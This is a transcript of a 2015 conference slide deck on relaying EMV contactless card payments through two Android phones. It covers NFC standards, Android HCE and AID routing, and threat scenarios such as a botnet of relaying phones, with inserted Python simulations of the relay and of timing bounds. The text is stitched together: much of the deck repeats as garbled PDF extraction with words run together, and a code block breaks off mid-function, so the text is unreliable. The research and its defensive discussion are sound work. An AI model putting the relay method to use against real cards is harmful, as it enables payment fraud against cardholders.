Relay Attacks in EMV Contactless Cards with Android OTS Devices

José Vila (†), Ricardo J. Rodríguez (‡)
pvtolkien@gmail.com, rjrodriguez@unileon.es
« All wrongs reversed

(†) Computer Science and Systems Engineering Dept., University of Zaragoza, Spain
(‡) Research Institute of Applied Sciences in Cybersecurity, University of León, Spain

May 28, 2015
Hack in the Box 2015, Amsterdam (Nederland)


About us

Pepe Vila. Security Consultant at E&Y. Twitter: @cgvwzq. http://vwzq.net
Main research interests: <JavaXSScript> and client-side attacks, NFC security, Android internals.

Dr. Ricardo J. Rodríguez. Senior Security Researcher at ULE. Twitter: @RicardoJRodriguez. http://www.ricardojrodriguez.es
Main research interests: security/safety modelling and analysis of ICS, advanced malware analysis, NFC security.

J. Vila, R. J. Rodríguez. Relay Attacks in EMV Contactless Cards with Android OTS Devices. HITB'15 AMS, slide 2/36

Agenda

1. Introduction
2. Background: EMV Contactless Cards; Relay Attacks and Mafia Frauds
3. Android and NFC, A Tale of L♥ve: Evolution of NFC Support in Android; Practical Implementation Alternatives in Android
4. Relay Attack Implementation: Demo experiment; Threat Scenarios; Resistant Mechanisms
5. Related Work
6. Conclusions


Introduction to NFC (I)

What is NFC? A bidirectional short-range contactless communication technology.
Range: up to 10 cm.
Based on RFID standards; works in the 13.56 MHz band.
Data transfer rates: 106, 212 and 424 kbps.
Its security relies on proximity, i.e. on physical constraints.


Introduction to NFC (II)

Wow, NFC sounds pretty hipster. Two main elements:
Proximity Coupling Device (PCD; also NFC-capable device, i.e. the reader)
Proximity Integrated Circuit Card (PICC; also NFC tag)

Three operation modes:
Peer-to-peer: direct communication between two NFC devices
Read/write: communication with an NFC tag
Card emulation: an NFC device behaves as a tag (card)

Introduction to NFC (III)

ISO/IEC 14443 standard: four-part international standard for contactless smartcards.
1. Size, physical characteristics, etc.
2. RF power and signalling schemes (Type A and Type B); half-duplex, 106 kbps base rate
3. Initialization and anticollision protocol
4. Data transmission protocol (the half-duplex block protocol that carries APDUs)
IsoDep: cards compliant with the four parts. Example: contactless payment cards.

Introduction to NFC (IV)

ISO/IEC 7816: fifteen-part international standard for contact integrated circuit cards, especially smartcards.
Part 4 defines the Application Protocol Data Units (APDUs): a command APDU is CLA INS P1 P2 [Lc data] [Le], and a response APDU is [data] SW1 SW2.

Introduction to NFC (V)

[Figure: antenna coupling illustration, taken from "13.56 MHz RFID Proximity Antennas" (NXP application note AN78010, http://www.nxp.com/documents/application_note/AN78010.pdf)]


Introduction to NFC (VI)

[Figure-only slide]

Introduction to NFC (VII)

Ok. So it is secure, right? Right?
If it were so secure you would not be staring at us :)

NFC security threats:
Eavesdropping. Solution: secure (encrypted) communication.
Data modification (i.e. alteration, insertion or destruction). Feasible in theory, but requires quite advanced RF knowledge.
Relays: forwarding of the wireless communication. Two types: passive (just forwards) or active (forwards and alters the data).
We focus on passive relay attacks.


Introduction to NFC (VIII)

NFC brings "cards" to mobile devices. The payment sector is quite interested in this new way of making payments:
500M NFC payment users expected by 2019.
Almost 300 smartphones with NFC capabilities available at the moment (check http://www.nfcworld.com/nfc-phones-list/). Most of them run Android OS.

Research hypothesis: can a passive relay attack be performed on contactless payment cards using an Android NFC-capable device? If so, what are the constraints (if any)?


Background (I): EMV contactless cards

Europay, Mastercard and VISA standard for the inter-operation of IC cards, Point-of-Sale terminals and automated teller machines, used to authenticate credit and debit card transactions. Commands are defined in ISO/IEC 7816-3 and ISO/IEC 7816-4 (http://en.wikipedia.org/wiki/EMV).
Each payment application on the card is identified by an Application ID (AID); the terminal starts a transaction with a SELECT command carrying that AID.

Background (II): MasterCard PayPass, VISA payWave and American Express ExpressPay

Are they secure?
Amount limit on a single transaction: up to £20 GBP, 20 €, US$50, 50 CHF, CAD$100 or AUD$100.
cough, cough (http://www.bankinfosecurity.com/android-attack-exploits-visa-emv-flaw-a-7516/op-1)
Sequential contactless payments are limited: after a number of them the card asks for the PIN.
Protected by the same fraud guarantee as standard transactions (hopefully).


Background (III): relay attacks and mafia frauds

Relay attacks: "On Numbers and Games", J. H. Conway (1976), the chess grandmaster problem.
Mafia frauds: Y. Desmedt (SecuriCom'88).

  P  <-->  V̄  <== communication link ==>  P̄  <-->  V

Real-time fraud where a fraudulent prover P̄ and a fraudulent verifier V̄ cooperate: V̄ talks to the honest prover P, P̄ talks to the honest verifier V, and every message is forwarded over the link, so P and V believe they are talking directly to each other.
Honest prover and verifier: contactless card and Point-of-Sale terminal.
Dishonest prover and verifier: two NFC-enabled Android devices.


Android and NFC: A Tale of L♥ve (I). Recap on the evolution of Android NFC support

[Timeline figure, reconstructed: tag technologies and NFC operation modes supported per release]

Android 2.3.3 Gingerbread (API level 10)
  Tag technologies: NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcF (JIS 6319-4), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), Ndef, NdefFormatable, MifareClassic, MifareUltralight
  Operation modes: reader/writer and peer-to-peer in software; card emulation only in hardware (Secure Element)

Android CyanogenMod 9.1 (thanks to Doug Yeager)
  Tag technologies added: IsoPcdA (ISO/IEC 14443-4A), IsoPcdB (ISO/IEC 14443-4B)
  Operation modes: software card emulation added, besides hardware card emulation

Android 4.2 Jelly Bean (API level 17)
  Tag technologies added: NfcBarcode

Android 4.4 KitKat (API level 19)
  Operation modes: reader/writer, peer-to-peer and card emulation in software (HCE), plus hardware card emulation; NfcAdapter.ReaderCallback added

Android and NFC: A Tale of L♥ve (II). Digging into the Android NFC stack

Event-driven framework with nice API support.
Two native implementations (depending on the built-in NFC chip): libnfc-nxp and libnfc-nci.
libnfc-nxp was dropped in favour of NCI (NFC Controller Interface): an open architecture not focused on a single chip family, defining an open interface between the NFC Controller (NFCC) and the Device Host (DH); standard proposed by the NFC Forum.


Android and NFC: A Tale of L♥ve (III). Digging into the Android NFC stack: reader/writer mode

Reader/writer mode cannot be set directly by an app; tag dispatch is bound to an Android activity: the Android NFC service selects candidate apps according to the tag (tech) filters declared in their manifest files.
At the low level, libnfc-nci uses a reliable mechanism of queues and message passing, the General Kernel Interface (GKI), which makes communication between layers and modules easier.

[Sequence diagram, reconstructed: path of a transceive() call from a user app down to the NFC controller]
User app -> NFC developer framework (Tag, NfcService: mTagService.transceive) -> IPC -> TagService -> DeviceHost.TagEndPoint, realized by NativeNfcTag -> JNI doTransceive -> system NFC library (NativeNfcTag.cpp) -> libnfc-nci

Android and NFC: A Tale of L♥ve (IV). Digging into the Android NFC stack: HCE mode

A service must be implemented to process commands and build replies: it extends the HostApduService abstract class and implements the processCommandApdu method.
Routing is AID-based: the OS keeps a routing table from AIDs to services, so you need to declare in advance (in the manifest) which AIDs your service handles; a SELECT for an undeclared AID is never delivered to your service.
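The mafia-fraud relay of Background (III) and the AID-routing constraint of this slide, modelled in Python as an added example (this is not the authors' app and not Android code): an honest terminal sends SELECT and a GENERATE AC command, an HCE-style router only dispatches to a service registered for the SELECTed AID, that service forwards each raw APDU over the relay link to the device holding the victim's card, and the terminal verifies the returned cryptogram. Assumptions of this example, not of the slides: an HMAC stands in for the EMV application cryptogram, the well-known PayPass AID A0000000041010 is used as the sample AID, routing is exact-match, the PoS and the issuer host are collapsed into one verifier, and the amount is a plain big-endian integer rather than EMV BCD. All class and function names are this example's own.

```python
import hashlib
import hmac
import os
from typing import Callable, Dict, List, Optional, Tuple

# ISO/IEC 7816-4 status words
SW_OK = b"\x90\x00"
SW_FILE_NOT_FOUND = b"\x6a\x82"     # answer to SELECT of an unknown AID
SW_INS_NOT_SUPPORTED = b"\x6d\x00"

PAYPASS_AID = bytes.fromhex("A0000000041010")   # public MasterCard PayPass AID (sample)
ISSUER_KEY = b"constructed-issuer-key"          # constructed sample key

Transceiver = Callable[[bytes], bytes]


def build_apdu(cla: int, ins: int, p1: int, p2: int, data: bytes = b"", le: Optional[int] = None) -> bytes:
    """Short-form command APDU: CLA INS P1 P2 [Lc data] [Le]."""
    apdu = bytes([cla, ins, p1, p2])
    if data:
        apdu += bytes([len(data)]) + data
    if le is not None:
        apdu += bytes([le])
    return apdu


def parse_apdu(apdu: bytes) -> Tuple[int, int, int, int, bytes]:
    """Split a short-form command APDU into (CLA, INS, P1, P2, data)."""
    if len(apdu) < 4:
        raise ValueError("APDU too short")
    cla, ins, p1, p2 = apdu[:4]
    if len(apdu) <= 5:                  # case 1 (no body) or case 2 (Le only)
        return cla, ins, p1, p2, b""
    return cla, ins, p1, p2, apdu[5:5 + apdu[4]]


class HonestCard:
    """Honest prover P: a contactless card with one payment application."""
    def __init__(self, aid: bytes, key: bytes) -> None:
        self.aid, self.key, self.selected = aid, key, False

    def transceive(self, apdu: bytes) -> bytes:
        cla, ins, p1, _p2, data = parse_apdu(apdu)
        if ins == 0xA4:                                            # SELECT
            self.selected = (p1 == 0x04 and data == self.aid)      # by AID
            return (b"\x6f\x00" + SW_OK) if self.selected else SW_FILE_NOT_FOUND
        if cla == 0x80 and ins == 0xAE and self.selected:          # GENERATE AC (HMAC stand-in)
            return hmac.new(self.key, data, hashlib.sha256).digest()[:8] + SW_OK
        return SW_INS_NOT_SUPPORTED


class HceRouter:
    """Android-style AID routing: APDUs only reach the service that registered
    the SELECTed AID (exact match); an unregistered AID is answered by the OS."""
    def __init__(self) -> None:
        self.services: Dict[bytes, Transceiver] = {}
        self.active: Optional[Transceiver] = None

    def register(self, aid: bytes, service: Transceiver) -> None:
        self.services[aid] = service

    def transceive(self, apdu: bytes) -> bytes:
        _cla, ins, p1, _p2, data = parse_apdu(apdu)
        if ins == 0xA4 and p1 == 0x04:
            self.active = self.services.get(data)       # unknown AID: nobody is called
        return SW_FILE_NOT_FOUND if self.active is None else self.active(apdu)


class RelayLink:
    """Relay channel: the dishonest prover's HostApduService forwards each APDU
    to the dishonest verifier (reader/writer mode) holding the victim's card."""
    def __init__(self, card: HonestCard) -> None:
        self.card, self.log = card, []     # type: HonestCard, List[Tuple[bytes, bytes]]

    def forward(self, apdu: bytes) -> bytes:
        rsp = self.card.transceive(apdu)
        self.log.append((apdu, rsp))
        return rsp


class HonestTerminal:
    """Honest verifier V: SELECT the application, then request a cryptogram."""
    def __init__(self, aid: bytes, issuer_key: bytes) -> None:
        self.aid, self.issuer_key = aid, issuer_key

    def run_transaction(self, picc: Transceiver, amount_cents: int) -> bool:
        if picc(build_apdu(0x00, 0xA4, 0x04, 0x00, self.aid, 0x00))[-2:] != SW_OK:
            return False
        cdol = amount_cents.to_bytes(6, "big") + os.urandom(4)    # amount + unpredictable number
        rsp = picc(build_apdu(0x80, 0xAE, 0x80, 0x00, cdol, 0x00))
        if rsp[-2:] != SW_OK:
            return False
        expected = hmac.new(self.issuer_key, cdol, hashlib.sha256).digest()[:8]
        return hmac.compare_digest(rsp[:-2], expected)


def run_direct(amount_cents: int = 2000) -> bool:
    """Card physically on the terminal: the reference behaviour."""
    card = HonestCard(PAYPASS_AID, ISSUER_KEY)
    return HonestTerminal(PAYPASS_AID, ISSUER_KEY).run_transaction(card.transceive, amount_cents)


def run_relay(aid_registered: bool = True, amount_cents: int = 2000) -> Tuple[bool, int]:
    """Returns (transaction accepted?, number of APDUs that crossed the relay)."""
    link = RelayLink(HonestCard(PAYPASS_AID, ISSUER_KEY))
    router = HceRouter()
    if aid_registered:
        router.register(PAYPASS_AID, link.forward)
    ok = HonestTerminal(PAYPASS_AID, ISSUER_KEY).run_transaction(router.transceive, amount_cents)
    return ok, len(link.log)


if __name__ == "__main__":
    print(run_direct())        # True
    print(run_relay(True))     # (True, 2): the terminal cannot tell the relay from the card
    print(run_relay(False))    # (False, 0): AID not declared, nothing ever reaches the card
```

The passive relay succeeds because every byte, including the cryptogram computed by the real card over the terminal's unpredictable number, is forwarded unchanged; the only thing the relaying service needs is the AID, which is exactly Limitation 2 on the following slides.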

Android and NFC: A Tale of L♥ve (V). Digging into the Android NFC stack: summary

Layer                                              | Language(s) | Dependency                | OSS
NFC developer framework (com.android.nfc package)  | Java, C++   | API level                 | Yes
System NFC library (libnfc-nxp or libnfc-nci)      | C/C++       | Manufacturer              | Yes
NFC Android kernel driver                          | C           | Hardware and manufacturer | Yes
NFC firmware (/system/vendor/firmware directory)   | ARM Thumb   | Hardware and manufacturer | No

Some useful links:
https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications/
http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
BCM20793S and BCM20793S-KMLG datasheets on datasheet4u.com (PDF ids 845670 and 845671)

Android and NFC: A Tale of L♥ve (VI). Some remarkable limitations

Limitation 1: the dishonest verifier communicates with a MIFARE Classic card.
libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands, because the CRC is computed by the NFCC (NFC controller); this can be overcome only if the NFCC firmware is modified.
Not an issue for us: EMV contactless cards are IsoDep, fully ISO/IEC 14443-4 compliant, and are driven with APDUs.

Limitation 2: the dishonest prover communicates with an honest verifier (device in HCE mode).
The AID must be known in advance (declared in the manifest); this can be overcome if the device is rooted. The Xposed framework may help to hook the routing, but it needs root permissions.


Android and NFC: A Tale of L♥ve (VII). Some remarkable limitations and remarks

Limitation 3: the dishonest prover and the dishonest verifier communicate through a non-reliable peer-to-peer relay channel.
ISO/IEC 14443-4 defines the Frame Waiting Time (the maximum time a PICC may take to answer a PCD frame) as

  FWT = 256 · (16 / fc) · 2^FWI,  0 ≤ FWI ≤ 14,  where fc = 13.56 MHz

so FWT ∈ [≈302 µs, ≈4.95 s] → a relay is theoretically possible as long as the extra round-trip delay per APDU stays below ≈5 s.

Concluding remarks:
Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed.
Any communication involving an APDU-compliant NFC tag (e.g. MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed.
And now, let's move to the practice :)


Relay Attack Implementation (I). Experiment configuration

PoS device: Ingenico IWL280 with GPRS and NFC support.
Android app developed (~2000 LOC), running on two OTS Android NFC-capable devices.
One constraint only: the dishonest prover (the device in HCE mode, facing the PoS) must run Android ≥ 4.4.


Relay Attack Implementation (II). Threat scenarios: Scenario 1, distributed mafia fraud

[Diagram: a botmaster and several bots; infected NFC-capable phones act as dishonest verifiers that relay the cards in their proximity to the botmaster]

Relay Attack Implementation (III). Threat scenarios: Scenario 2, hiding fraud locations

[Diagram-only slide: the payment is made at a PoS far away from the place where the victim's card is read]

Relay Attack Implementation (IV). Resistant mechanisms

Brief summary of resistant mechanisms:
Distance-bounding protocols: upper-bound the physical distance using the round-trip time of cryptographic challenge-response messages.
Timing constraints: not enforced in current NFC-capable systems, and the protocol itself allows timing-extension commands (the ISO/IEC 14443-4 S(WTX) frame waiting time extension).
Physical countermeasures: whitelisting/blacklisting by UID (a device in HCE mode presents a random UID → unfeasible); RFID-blocking covers; physical button/switch activation; secondary authentication methods (e.g. on-card fingerprint scanners).
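The FWT budget of Limitation 3 and the distance-bounding idea of this slide, worked through as an added Python example (not from the slides): it evaluates the FWT formula quoted on the Limitation 3 slide for every FWI, checks whether a relay round trip fits in that budget with and without an S(WTX) extension (multiplier 1..59 as in ISO/IEC 14443-4), and contrasts it with a real distance bound d ≤ c·(RTT − t_proc)/2 computed from the same round trip. The function names and the sample delays (1 µs prover processing, 5 ms relay channel) are constructed for this example.

```python
C_M_PER_S = 299_792_458.0   # speed of light, the physical limit a distance bound relies on
FC_HZ = 13.56e6             # ISO/IEC 14443 carrier frequency fc
WTXM_MAX = 59               # largest multiplier an S(WTX) request may carry (ISO/IEC 14443-4)


def fwt_seconds(fwi: int) -> float:
    """Frame Waiting Time: FWT = 256 * (16 / fc) * 2**FWI, with 0 <= FWI <= 14."""
    if not 0 <= fwi <= 14:
        raise ValueError("FWI must be in 0..14")
    return 256.0 * (16.0 / FC_HZ) * (2 ** fwi)


def fwt_table() -> dict:
    """FWT for every legal FWI, in seconds (FWI 0 is about 302 us, FWI 14 about 4.95 s)."""
    return {fwi: fwt_seconds(fwi) for fwi in range(15)}


def relay_fits(fwi: int, relay_rtt_s: float, card_time_s: float = 0.0, wtxm: int = 1) -> bool:
    """Does card processing plus the relay round trip fit before the PCD gives up?
    The PICC side (a real card or an emulator) may stretch the budget by WTXM via S(WTX)."""
    if not 1 <= wtxm <= WTXM_MAX:
        raise ValueError("WTXM must be in 1..59")
    return card_time_s + relay_rtt_s <= fwt_seconds(fwi) * wtxm


def round_trip_s(distance_m: float, prover_time_s: float, relay_delay_s: float = 0.0) -> float:
    """Challenge/response RTT seen by the verifier: flight time both ways,
    prover processing, and whatever a relay channel adds on top."""
    return 2.0 * distance_m / C_M_PER_S + prover_time_s + relay_delay_s


def distance_bound_accepts(rtt_s: float, prover_time_s: float, max_distance_m: float) -> bool:
    """Distance-bounding check: the prover can be at most c*(rtt - t_proc)/2 away."""
    return C_M_PER_S * max(rtt_s - prover_time_s, 0.0) / 2.0 <= max_distance_m


def fwt_as_distance_bound_m(fwi: int) -> float:
    """How far a prover could be if FWT alone were used as the distance bound."""
    return C_M_PER_S * fwt_seconds(fwi) / 2.0


def compare_checks(fwi: int, relay_delay_s: float, prover_time_s: float = 1e-6,
                   distance_m: float = 0.05, max_distance_m: float = 0.10) -> tuple:
    """(accepted by the FWT timeout?, accepted by a distance bound?) for one exchange."""
    rtt = round_trip_s(distance_m, prover_time_s, relay_delay_s)
    return relay_fits(fwi, rtt), distance_bound_accepts(rtt, prover_time_s, max_distance_m)


if __name__ == "__main__":
    for fwi, fwt in fwt_table().items():
        print(f"FWI={fwi:2d}  FWT={fwt * 1e3:10.3f} ms  naive distance bound={fwt_as_distance_bound_m(fwi):.0f} m")
    print("card on the reader      :", compare_checks(14, relay_delay_s=0.0))     # (True, True)
    print("card relayed, 5 ms link :", compare_checks(14, relay_delay_s=5e-3))    # (True, False)
```

Even the shortest FWT (FWI = 0) corresponds to a signal travelling about 45 km and back, so the ISO/IEC 14443-4 timeout gives no proximity guarantee at all, which is why the slide lists timing constraints as "not enforced"; a distance-bounding protocol needs a round trip measured at the nanosecond scale and a prover whose processing time is fixed and known.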


Related work on relay attacks

2005-2009: first works, built on specific hardware.
2010: Nokia mobile phones with NFC capability plus a Java MIDlet app.
2012-2013: relay attacks on Android accessing the Secure Element (an SE securely stores the data associated with credit/debit cards); needs a non-OTS Android device.
2014: active relay attacks with custom hardware and custom Android firmware.
Several works studied the delay introduced by the relay channel: relays over long distances are feasible → latency isn't a hard constraint.
Ask us for specific references: too many names for a single slide.


Conclusions (I)

The security of NFC is based on the physical proximity assumption.
NFC threats: eavesdropping, data modification, relay attacks.
Android NFC-capable devices are on the rise and can be abused to interact with cards in their proximity.

Conclusions:
Review of the Android NFC stack.
Proof-of-concept of relay attacks using Android OTS devices.
Threat scenarios introduced.
Virtual pickpocketing attacks may appear before long.


Conclusions (II). But then, what the hell can I do? Should I run away?

[Image-only slide]


Conclusions (III)

Future work:
Develop a botnet infrastructure and earn money (struck out on the slide)
Timing constraints of Android HCE mode.
Try active relay attacks on EMV contactless cards.

Acknowledgments: Spanish National Cybersecurity Institute (INCIBE); University of León under contract X43; HITB staff.
And thanks to all of you for listening to us.
Visit http://vwzq.net/relaynfc for more info about the project.

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 2: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

About us

Pepe VilaSecurity Consultant at EampYtw cgvwzq

httpvwzqnet

Main research interestsltJavaXSScriptgtandclient-side attacks

NFC security

Android internals

Dr Ricardo J RodrıguezSenior Security Researcher at ULE

tw RicardoJRodriguez

httpwwwricardojrodriguezes

Main research interestsSecuritysafety modelling andanalysis of ICS

Advanced malware analysis

NFC security

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 2 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 3 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 4 36

Introduction to NFC (I)

What is NFCBidirectional short-range contactless communication technology

Up to 10 cm

Based on RFID standards works in the 1356 MHz spectrum

Data transfer rates vary 106 216 and 424 kbps

Security based on proximity concern physical constraints

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36

Introduction to NFC (I)

What is NFCBidirectional short-range contactless communication technology

Up to 10 cm

Based on RFID standards works in the 1356 MHz spectrum

Data transfer rates vary 106 216 and 424 kbps

Security based on proximity concern physical constraints

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36

Introduction to NFC (II)

Wow NFC sounds pretty hipsterTwo main elements

Proximity Coupling Device (PCD also NFC-capable device)Proximity Integrated Circuit Cards (PICC also NFC tags)

Three operation modesPeer to peer direct communication between partiesReadwrite communication with a NFC tagCard-emulation an NFC device behaves as a tag

Introduction to NFC (III)

ISO/IEC 14443 standard
Four-part international standard for contactless smartcards:
  1 Size, physical characteristics, etc.
  2 RF power and signalling schemes (Type A & B); half-duplex, 106 kbps rate
  3 Initialization + anticollision protocol
  4 Data transmission protocol
IsoDep: cards compliant with all four parts
  Example: contactless payment cards

Introduction to NFC (IV)

ISO/IEC 7816
Fifteen-part international standard related to contacted integrated circuit cards, especially smartcards
Commands and responses are exchanged as Application Protocol Data Units (APDUs)

Introduction to NFC (V)

[Figure taken from "13.56 MHz RFID Proximity Antennas" (http://www.nxp.com/documents/application_note/AN78010.pdf)]

Introduction to NFC (VI)

Introduction to NFC (VII)

Ok. So it is secure, right? Right?
If it were so secure, you would not be staring at us

NFC security threats:
  Eavesdropping
    Secure communication as the solution
  Data modification (i.e., alteration, insertion or destruction)
    Feasible in theory (but requires quite advanced RF knowledge)
  Relays: forwarding of the wireless communication
    Two types: passive (just forwards) or active (forwards and alters the data)

We focus on passive relay attacks

Introduction to NFC (VIII)

NFC brings "cards" to mobile devices
The payment sector is quite interested in this new way of making payments
  500M NFC payment users expected by 2019
  Almost 300 smart phones with NFC capabilities available at the moment
    Check http://www.nfcworld.com/nfc-phones-list
  Most of them run Android OS

Research Hypothesis
Can a passive relay attack be performed on contactless payment cards using an Android NFC-capable device?
If so, what are the constraints (if any exist)?

Background (I)
EMV contactless cards

Europay, MasterCard and VISA: standard for inter-operation of IC cards, Point-of-Sale terminals and automated teller machines
  Authenticates credit and debit card transactions
  Commands defined in ISO/IEC 7816-3 and ISO/IEC 7816-4 (http://en.wikipedia.org/wiki/EMV)
  Application ID (AID): the application on the card is chosen with the SELECT command

Background (II)
MasterCard PayPass, VISA payWave and American Express ExpressPay

Are they secure?
  Amount limit on a single transaction: up to £20 GBP, 20€, US$50, 50 CHF, CAD$100 or AUD$100
    cof, cof (http://www.bankinfosecurity.com/android-attack-exploits-visa-emv-flaw-a-7516/op-1)
  Sequential contactless payments are limited – it asks for the PIN
  Protected by the same fraud guarantee as standard transactions (hopefully)

Background (III)

Relay attacks: "On Numbers and Games", J. H. Conway (1976)
Mafia frauds – Y. Desmedt (SecuriCom'88)

  P ⟷ V'  ~~~ communication link ~~~  P' ⟷ V     (P and V honest; P' and V' the colluding pair)

Real-time fraud where a fraudulent prover P' and a fraudulent verifier V' cooperate
  Honest prover and verifier: contactless card and Point-of-Sale terminal
  Dishonest prover and verifier: two NFC-enabled Android devices

Android and NFC: A Tale of L♥ve (I)
Recap on the evolution of Android NFC support

[Figure: timeline of Android NFC support, with the NFC operation modes supported at each step]

Android 2.3.3 Gingerbread (API level 10)
  Tag technologies: NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcF (JIS 6319-4), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), Ndef, NdefFormatable, MifareClassic, MifareUltralight
  Operation modes: software reader/writer and peer-to-peer; hardware card-emulation

Android CyanogenMod OS 9.1 (thanks to Doug Yeager)
  IsoPcdA (ISO/IEC 14443-4A), IsoPcdB (ISO/IEC 14443-4B): software card-emulation

Android 4.2 Jelly Bean (API level 17)
  NfcBarcode

Android 4.4 KitKat (API level 19)
  Operation modes: software reader/writer, peer-to-peer and card-emulation (HCE); hardware card-emulation
  NfcAdapter.ReaderCallback added

Android and NFC: A Tale of L♥ve (II)
Digging into the Android NFC stack

Event-driven framework, nice API support
Two native implementations (depending on the built-in NFC chip):
  libnfc-nxp
  libnfc-nci
NXP dropped in favour of NCI (NFC Controller Interface):
  Open architecture, not focused on a single chip family
  Open interface between the NFC Controller (NFCC) and the Device Host (DH)
  Standard proposed by the NFC Forum

Android and NFC: A Tale of L♥ve (III)
Digging into the Android NFC stack – Reader/Writer mode

Reader/Writer mode cannot be set directly → it is tied to an Android activity
  The Android NFC service selects apps according to the tag definition in the Manifest file
At low level, libnfc-nci uses a reliable mechanism of queues and message passing – the General Kernel Interface (GKI)
  Makes communication between layers and modules easier

[Figure: path of a transceive call from a user app down to libnfc-nci]
  User App → Tag (NFC developer framework) → NfcService: mTagService.transceive
  → IPC → TagService → DeviceHost.TagEndPoint <<realize>> NativeNfcTag
  → JNI: doTransceive → System NFC library: NativeNfcTag.cpp → libnfc-nci

Android and NFC: A Tale of L♥ve (IV)
Digging into the Android NFC stack – HCE mode

A service must be implemented to process commands and replies
  HostApduService abstract class and its processCommandApdu method
AID-based routing: a service table
  This means you need to declare in advance which AID you handle
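The APDU and AID mechanics behind this slide (and the APDU and SELECT-by-AID notes in the Introduction and Background sections), modelled in Python as an added example that is not the authors' app nor Android's code: a short-form ISO/IEC 7816-4 command APDU is parsed, a SELECT by AID is recognised, and a hypothetical `AidRouter` plays the role of the HCE routing table, so an APDU for an AID that was not declared in advance is never delivered to any service. The AIDs and APDUs are constructed test vectors; only the PPSE name "2PAY.SYS.DDF01" is a real, standard EMV contactless directory AID.

```python
"""Command APDU parsing and AID-based routing, modelled after Android HCE.

Added example (not the talk's relay app): shows why the AID of the honest
prover must be known in advance. All APDUs below are constructed vectors.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

INS_SELECT = 0xA4              # ISO/IEC 7816-4 SELECT instruction
P1_SELECT_BY_DF_NAME = 0x04    # P1 = 04: select by DF name, i.e. by AID


@dataclass(frozen=True)
class CommandApdu:
    cla: int
    ins: int
    p1: int
    p2: int
    data: bytes
    le: Optional[int]          # None when no Le field is present


def parse_apdu(raw: bytes) -> CommandApdu:
    """Parse a short-form ISO/IEC 7816-4 command APDU (cases 1 to 4)."""
    if len(raw) < 4:
        raise ValueError("APDU shorter than the 4-byte header")
    cla, ins, p1, p2 = raw[0], raw[1], raw[2], raw[3]
    body = raw[4:]
    data, le = b"", None
    if len(body) == 1:                        # case 2: Le only
        le = body[0] or 256                   # Le = 00 means 256 bytes
    elif len(body) > 1:
        lc = body[0]
        if len(body) == 1 + lc:               # case 3: Lc + data
            data = body[1:]
        elif len(body) == 2 + lc:             # case 4: Lc + data + Le
            data, le = body[1:1 + lc], (body[-1] or 256)
        else:
            raise ValueError("Lc does not match the body length")
    return CommandApdu(cla, ins, p1, p2, bytes(data), le)


def selected_aid(cmd: CommandApdu) -> Optional[bytes]:
    """Return the AID when the command is a SELECT by DF name, else None."""
    if cmd.ins == INS_SELECT and cmd.p1 == P1_SELECT_BY_DF_NAME:
        return cmd.data
    return None


class AidRouter:
    """Hypothetical model of the static AID routing table described on the
    slide: a SELECT AID goes to the service that registered exactly that
    AID, and every following APDU goes to the same service until the next
    SELECT. A SELECT for an unregistered AID is delivered to nobody."""

    def __init__(self) -> None:
        self.table: Dict[bytes, str] = {}
        self.current: Optional[str] = None

    def register(self, aid_hex: str, service: str) -> None:
        # Same role as an <aid-filter> entry in an HCE service's XML resource.
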